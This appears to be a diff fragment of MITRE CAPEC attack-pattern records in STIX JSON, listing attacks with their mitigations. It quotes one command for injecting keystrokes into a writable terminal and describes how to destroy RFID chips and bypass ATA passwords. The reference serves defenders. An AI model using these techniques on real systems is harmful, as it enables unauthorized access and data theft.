"marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--5e808864-44b1-478c-8cb0-75c55cd51e2b" + ], + "x_capec_domains": [ + "Physical Security" + ], + "x_capec_extended_description": "\n RFID (Radio Frequency Identification) are passive devices which consist of an integrated circuit for processing RF signals and an antenna. RFID devices are passive in that they lack an on on-board power source. The majority of RFID chips operate on either the 13.56 MHz or 135 KHz frequency. The chip is powered when a signal is received by the antenna on the chip, powering the chip long enough to send a reply message. An attacker is able to capture and analyze RFID data by either stimulating the chip to respond or being proximate to the chip when it sends a response to a remote transmitter. This allows the attacker to duplicate the signal and conduct attacks such as gaining unauthorized access to a building or impersonating a user's identification.\n ", + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack relies on the adversary using unexpected formats for representing IP addresses. Networked applications may expect network location information in a specific format, such as fully qualified domains names (FQDNs), URL, IP address, or IP Address ranges. If the location information is not validated against a variety of different possible encodings and formats, the adversary can use an alternate format to bypass application access control.", + "external_references": [ + { + "external_id": "CAPEC-4", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/4.html" + }, + { + "external_id": "CWE-291", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/291.html" + }, + { + "external_id": "CWE-173", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/173.html" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--00d91a4c-2645-4bf1-8db7-e7448ef25f17", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Using Alternative IP Address Encodings", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--a1af7c24-25cb-46e5-a27b-ed316e1f91ce" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "An adversary identifies an application server that applies a security policy based on the domain and application name. For example, the access control policy covers authentication and authorization for anyone accessing http://example.domain:8080/application. However, by using the IP address of the host instead (http://192.168.0.1:8080/application), the application authentication and authorization controls may be bypassed. The adversary relies on the victim applying policy to the namespace abstraction and not having a default deny policy in place to manage exceptions." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey the application for IP addresses as user input: Using a browser, an automated tool or by inspecting the application, an adversary records all entry points to the application where IP addresses are used.

    2. Techniques
    Use a spidering tool to follow and record all links and analyze the web pages to find entry points. Make special note of any links that include parameters in the URL.
    Use a proxy tool to record all user input entry points visited during a manual traversal of the web application.
    Use a browser to manually explore the website and analyze how it is constructed. Many browsers' plugins are available to facilitate the analysis or automate the discovery.
    Manually inspect the application to find entry points.

Experiment

  1. Probe entry points to locate vulnerabilities: The adversary uses the entry points gathered in the \"Explore\" phase as a target list and attempts alternate IP address encodings, observing application behavior. The adversary will also attempt to access the application through an alternate IP address encoding to see if access control changes

    2. Techniques
    Instead of using a URL, use the IP address that the URL resolves to
    Specify a port directly to a URL input
    Omit or add \"http://\" or \"https://\" to a URL to see if the application behaves differently

Exploit

  1. Bypass access control: Using an alternate IP address encoding, the adversary will either access the application or give the alternate encoding as input, bypassing access control restrictions.

", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The target software must fail to anticipate all of the possible valid encodings of an IP/web address.", + "The adversary must have the ability to communicate with the server." + ], + "x_capec_resources_required": [ + "The adversary needs to have knowledge of an alternative IP address encoding that bypasses the access control policy of an application. Alternatively, the adversary can simply try to brute-force various encoding possibilities." + ], + "x_capec_skills_required": { + "Low": "The adversary has only to try IP address format combinations." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Default deny access control policies", + "id": "course-of-action--f365abec-a16c-48a7-ae51-bdc687d899bb", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-4-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--484c12f4-80ad-4fe0-91ec-ad26afdc6082", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f365abec-a16c-48a7-ae51-bdc687d899bb", + "spec_version": "2.1", + "target_ref": "attack-pattern--00d91a4c-2645-4bf1-8db7-e7448ef25f17", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Input validation routines should check and enforce both input data types and content against a positive specification. In regards to IP addresses, this should include the authorized manner for the application to represent IP addresses and not accept user specified IP addresses and IP address formats (such as ranges)", + "id": "course-of-action--a4679da3-09cf-480b-ad0c-5606e510b08d", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-4-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--b789de10-900c-4578-a3f2-13683cc5bbc8", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a4679da3-09cf-480b-ad0c-5606e510b08d", + "spec_version": "2.1", + "target_ref": "attack-pattern--00d91a4c-2645-4bf1-8db7-e7448ef25f17", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--62c4c1aa-5430-4146-8735-ca6959483c64", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--8a996efc-52e0-4aaf-953a-21c3fe64c64b", + "spec_version": "2.1", + "target_ref": "attack-pattern--00d91a4c-2645-4bf1-8db7-e7448ef25f17", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack exploits terminal devices that allow themselves to be written to by other users. The attacker sends command strings to the target terminal device hoping that the target user will hit enter and thereby execute the malicious command with their privileges. The attacker can send the results (such as copying /etc/passwd) to a known directory and collect once the attack has succeeded.", + "external_references": [ + { + "external_id": "CAPEC-40", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/40.html" + }, + { + "external_id": "CWE-77", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/77.html" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--326dfb79-2d81-406a-9977-79e67d8de6e2", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Manipulating Writeable Terminal Devices", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--2fb2b2b8-b7de-45a2-aadb-5849d12fda8f" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Gain Privileges", + "Read Data", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n \"Any system that allows other peers to write directly to its terminal process is vulnerable to this type of attack. If the terminals are available through being over-privileged (i.e. world-writable) or the attacker is an administrator, then a series of commands in this format can be used to echo commands out to victim terminals.\n \"$echo -e \"\\033[30m\\033\\132\" > /dev/ttyXX\n where XX is the tty number of the user under attack. This will paste the characters to another terminal (tty). Note this technique works only if the victim's tty is world writable (which it may not be). That is one reason why programs like write(1) and talk(1) in UNIX systems need to run setuid.\" [REF-1]\n If the victim continues to hit \"enter\" and execute the commands, there are an endless supply of vectors available to the attacker, copying files, open up network connections, ftp out to servers, and so on.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Identify attacker-writable terminals: Determine if users TTYs are writable by the attacker.

    2. Techniques
    Determine the permissions for the TTYs found on the system. Any that allow user write to the TTY may be vulnerable.
    Attempt to write to other user TTYs. This approach could leave a trail or alert a user.

Exploit

  1. Execute malicious commands: Using one or more vulnerable TTY, execute commands to achieve various impacts.

    2. Techniques
    Commands that allow reading or writing end user files can be executed.
", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "User terminals must have a permissive access control such as world writeable that allows normal users to control data on other user's terminals." + ], + "x_capec_resources_required": [ + "Access to a terminal on the target network" + ], + "x_capec_skills_required": { + "Low": "Ability to discover permissions on terminal devices. Of course, brute force can also be used." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Ensure that terminals are only writeable by named owner user and/or administrator", + "id": "course-of-action--022f6443-4421-4a54-beb6-d471aad577cb", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-40-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f41d0244-df5c-41e8-9fd1-046642dd7609", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--022f6443-4421-4a54-beb6-d471aad577cb", + "spec_version": "2.1", + "target_ref": "attack-pattern--326dfb79-2d81-406a-9977-79e67d8de6e2", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--b79f1d6a-d501-4456-9de3-b3cf4778b8f1", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a4112a44-a0f9-4bde-bebe-74ed96c4cd3f", + "spec_version": "2.1", + "target_ref": "attack-pattern--326dfb79-2d81-406a-9977-79e67d8de6e2", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker uses methods to deactivate a passive RFID tag for the purpose of rendering the tag, badge, card, or object containing the tag unresponsive. RFID tags are used primarily for access control, inventory, or anti-theft devices. The purpose of attacking the RFID chip is to disable or damage the chip without causing damage to the object housing it.", + "external_references": [ + { + "external_id": "CAPEC-400", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/400.html" + }, + { + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--309b5fec-8a59-4d28-8a1c-427d289aad93", + "modified": "2022-02-22T00:00:00.000Z", + "name": "RFID Chip Deactivation or Destruction", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--5e808864-44b1-478c-8cb0-75c55cd51e2b" + ], + "x_capec_domains": [ + "Physical Security" + ], + "x_capec_extended_description": "\n When correctly performed the RFID chip can be disabled or destroyed without visible damage or marking to whatever item or device containing the chip. Attacking the chip directly allows for the security device or method to be bypassed without directly damaging the device itself, such as an alarm system or computer system. Various methods exist for damaging or deactivating RFID tags. For example, most common RFID chips can be permanently destroyed by creating a small electromagnetic pulse near the chip itself. One method employed requires the modifying a disposable camera by disconnecting the flash bulb and soldering a copper coil to the capacitor. Firing the camera in this configuration near any RFID chip-based device creates an EMP pulse sufficient to destroy the chip without leaving evidence of tampering. So far this attack has been demonstrated to work against RFID chips in the 13.56 MHz range.\n ", + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary exploits a weakness in access control to gain access to currently installed hardware and precedes to implement changes or secretly replace a hardware component which undermines the system's integrity for the purpose of carrying out an attack.", + "external_references": [ + { + "external_id": "CAPEC-401", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/401.html" + }, + { + "external_id": "CWE-1263", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1263.html" + } + ], + "id": "attack-pattern--fdf61d51-9432-47d3-9376-7cf51fc86176", + "modified": "2020-07-30T00:00:00.000Z", + "name": "Physically Hacking Hardware", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--7fd3928c-accb-4a35-ba64-000339399ede" + ], + "x_capec_domains": [ + "Supply Chain", + "Physical Security", + "Hardware" + ], + "x_capec_example_instances": [ + "A malicious subcontractor or subcontractor's employee that is responsible for system maintenance secretly replaces a hard drive with one containing malicious code that will allow for backdoor access once deployed." + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_parent_of_refs": [ + "attack-pattern--6aac48b7-c277-46ba-b9c0-523471a84c11" + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary exploits a weakness in ATA security on a drive to gain access to the information the drive contains without supplying the proper credentials. ATA Security is often employed to protect hard disk information from unauthorized access. The mechanism requires the user to type in a password before the BIOS is allowed access to drive contents. Some implementations of ATA security will accept the ATA command to update the password without the user having authenticated with the BIOS. This occurs because the security mechanism assumes the user has first authenticated via the BIOS prior to sending commands to the drive. Various methods exist for exploiting this flaw, the most common being installing the ATA protected drive into a system lacking ATA security features (a.k.a. hot swapping). Once the drive is installed into the new system the BIOS can be used to reset the drive password.", + "external_references": [ + { + "external_id": "CAPEC-402", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/402.html" + }, + { + "external_id": "CWE-285", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/285.html" + }, + { + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Oliver Tennert, Using the ATA security features of modern hard disks and SSDs, 2014, Admin Magazine", + "external_id": "REF-701", + "source_name": "reference_from_CAPEC", + "url": "https://www.admin-magazine.com/Archive/2014/19/Using-the-ATA-security-features-of-modern-hard-disks-and-SSDs" + }, + { + "description": "Breaking ATA Password Security, The University of Texas at Austin Information Security Office", + "external_id": "REF-702", + "source_name": "reference_from_CAPEC", + "url": "https://security.utexas.edu/education-outreach/BreakingATA" + } + ], + "id": "attack-pattern--6aac48b7-c277-46ba-b9c0-523471a84c11", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Bypassing ATA Password Security", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--fdf61d51-9432-47d3-9376-7cf51fc86176" + ], + "x_capec_domains": [ + "Supply Chain", + "Physical Security", + "Hardware" + ], + "x_capec_example_instances": [ + "\n The A-FF Repair Station tool is a data recovery utility that can be used for ATA password removal (both High and Maximum level) and firmware area recovery. An adversary with access to this tool could reset the ATA password to bypass this security feature and unlock the hard drive. The adversary could then obtain any data contained within the drive. [REF-702]\n ", + "\n An adversary gains physical access to the targeted hard drive and installs it into a system that does not support ATA security features. Once the drive is installed in the feature-lacking system, the adversary is able to reset the hard drive password via the BIOS. As a result, the adversary is able to bypass ATA password security and access content on the drive.\n " + ], + "x_capec_prerequisites": [ + "Access to the system containing the ATA Drive so that the drive can be physically removed from the system." + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Avoid using ATA password security when possible.", + "id": "course-of-action--6517b3e0-2d56-4f34-b75e-67e8a327434d", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-402-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--3377c55f-aabe-4243-9923-088c08ad5f3f", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--6517b3e0-2d56-4f34-b75e-67e8a327434d", + "spec_version": "2.1", + "target_ref": "attack-pattern--6aac48b7-c277-46ba-b9c0-523471a84c11", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use full disk encryption to protect the entire contents of the drive or sensitive partitions on the drive.", + "id": "course-of-action--42bee69d-54e9-4b16-8e31-ea5eadd37120", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-402-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--3007f9eb-cd21-4e1f-b66e-4faf4bc852de", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--42bee69d-54e9-4b16-8e31-ea5eadd37120", + "spec_version": "2.1", + "target_ref": "attack-pattern--6aac48b7-c277-46ba-b9c0-523471a84c11", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Leverage third-party utilities that interface with self-encrypting drives (SEDs) to provide authentication, while relying on the SED itself for data encryption.", + "id": "course-of-action--e68d238e-2bf8-4a45-ad2d-e5217401df20", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-402-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--1e1565d8-9f05-4df6-8075-d2aab55a1c8a", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--e68d238e-2bf8-4a45-ad2d-e5217401df20", + "spec_version": "2.1", + "target_ref": "attack-pattern--6aac48b7-c277-46ba-b9c0-523471a84c11", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated as it was deemed not to be a legitimate attack pattern. Please refer to CAPEC-118 : Collect and Analyze Information.", + "external_references": [ + { + "external_id": "CAPEC-404", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/404.html" + }, + { + "description": "The Official Social Engineering Portal, Social-Engineer.org, Tick Tock Computers, LLC", + "external_id": "REF-348", + "source_name": "reference_from_CAPEC", + "url": "http://www.social-engineer.org" + } + ], + "id": "attack-pattern--93f7216f-ddbe-4484-8fa6-87b680f16898", + "modified": "2018-07-31T00:00:00.000Z", + "name": "DEPRECATED: Social Information Gathering Attacks", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated as it was deemed not to be a legitimate attack pattern. Please refer to CAPEC-118 : Collect and Analyze Information.", + "external_references": [ + { + "external_id": "CAPEC-405", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/405.html" + }, + { + "description": "The Official Social Engineering Portal, Social-Engineer.org, Tick Tock Computers, LLC", + "external_id": "REF-348", + "source_name": "reference_from_CAPEC", + "url": "http://www.social-engineer.org" + } + ], + "id": "attack-pattern--d4fd1606-6a28-4831-956b-ceab18f3546a", + "modified": "2018-07-31T00:00:00.000Z", + "name": "DEPRECATED: Social Information Gathering via Research", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary cases an establishment and searches through trash bins, dumpsters, or areas where company information may have been accidentally discarded for information items which may be useful to the dumpster diver. The devastating nature of the items and/or information found can be anything from medical records, resumes, personal photos and emails, bank statements, account details or information about software, tech support logs and so much more, including hardware devices. By collecting this information an adversary may be able to learn important facts about the person or organization that play a role in helping the adversary in their attack.", + "external_references": [ + { + "external_id": "CAPEC-406", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/406.html" + }, + { + "description": "The Official Social Engineering Portal, Social-Engineer.org, Tick Tock Computers, LLC", + "external_id": "REF-348", + "source_name": "reference_from_CAPEC", + "url": "http://www.social-engineer.org" + } + ], + "id": "attack-pattern--756a1a93-3734-426c-9e91-f9339de74a7a", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Dumpster Diving", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_precede_refs": [ + "attack-pattern--ff3cf9fc-c308-4571-8a01-ecae629a49c1", + "attack-pattern--a8b4faf6-2e52-434f-95a4-df5f9bdc985a" + ], + "x_capec_child_of_refs": [ + "attack-pattern--797f4b4e-371a-4d06-9e98-5cccb8a7ebc1" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Other (Documents and materials improperly disposed of can lead to information disclosure if an adversary comes across it.)" + ] + }, + "x_capec_domains": [ + "Physical Security" + ], + "x_capec_prerequisites": [ + "An adversary must have physical access to the dumpster or downstream processing facility." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary engages in pretexting behavior to solicit information from target persons, or manipulate the target into performing some action that serves the adversary's interests. During a pretexting attack, the adversary creates an invented scenario, assuming an identity or role to persuade a targeted victim to release information or perform some action. It is more than just creating a lie; in some cases it can be creating a whole new identity and then using that identity to manipulate the receipt of information.", + "external_references": [ + { + "external_id": "CAPEC-407", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/407.html" + }, + { + "description": "Gather Victim Identity Information", + "external_id": "T1589", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1589" + }, + { + "description": "The Official Social Engineering Portal, Social-Engineer.org, Tick Tock Computers, LLC", + "external_id": "REF-348", + "source_name": "reference_from_CAPEC", + "url": "http://www.social-engineer.org" + } + ], + "id": "attack-pattern--8b329689-f8f8-466e-a890-4e30b8d8ec30", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Pretexting", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_precede_refs": [ + "attack-pattern--ff3cf9fc-c308-4571-8a01-ecae629a49c1" + ], + "x_capec_child_of_refs": [ + "attack-pattern--eedaef1c-c3fb-4135-a1b5-4b186b9da854", + "attack-pattern--5c60a410-64a7-46e2-9d46-82a232a6ce3e" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Other (Depending on the adversary's intentions and the specific nature their actions/requests, a successful pretexting attack can result in the compromise to the confidentiality of sensitive information in a variety of contexts.)" + ] + }, + "x_capec_domains": [ + "Social Engineering", + "Social Engineering", + "Software" + ], + "x_capec_example_instances": [ + "The adversary dresses up like a jogger and runs in place by the entrance of a building, pretending to look for their access card. Because the hood obscures their face, it may be possible to solicit someone inside the building to let them inside." + ], + "x_capec_extended_description": "\n Pretexting can also be used to impersonate people in certain jobs and roles that they never themselves have done. In simple form, these attacks can be leveraged to learn information about a target. More complicated iterations may seek to solicit a target to perform some action that assists the adversary in exploiting organizational weaknesses or obtaining access to secure facilities or systems. Pretexting is not a one-size fits all solution. Good information gathering techniques can make or break a good pretext. A solid pretext is an essential part of building trust. If an adversary’s alias, story, or identity has holes or lacks credibility or even the perception of credibility the target will most likely catch on.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_parent_of_refs": [ + "attack-pattern--2a8a634e-cf1f-4b2e-9a71-1ab8e6bb16d0", + "attack-pattern--2d533987-71b1-41a3-873b-38d63188d2eb", + "attack-pattern--5e0c909b-70a3-4275-a696-91801247ed68", + "attack-pattern--7ed74d19-ed2b-40c4-a63c-54367b2653c4", + "attack-pattern--490fc09c-a624-44cd-8e9e-f4ce8ad2311e" + ], + "x_capec_prerequisites": [ + "The adversary must have the means and knowledge of how to communicate with the target in some manner.The adversary must have knowledge of the pretext that would influence the actions of the specific target." + ], + "x_capec_skills_required": { + "Low": "The adversary requires strong inter-personal and communication skills." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An organization should provide regular, robust cybersecurity training to its employees to prevent successful social engineering attacks.", + "id": "course-of-action--e2e37142-f4ef-407a-a43e-f0e3ecad8596", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-407-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--bff09429-66bb-4bc2-90be-eb28271786e4", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--e2e37142-f4ef-407a-a43e-f0e3ecad8596", + "spec_version": "2.1", + "target_ref": 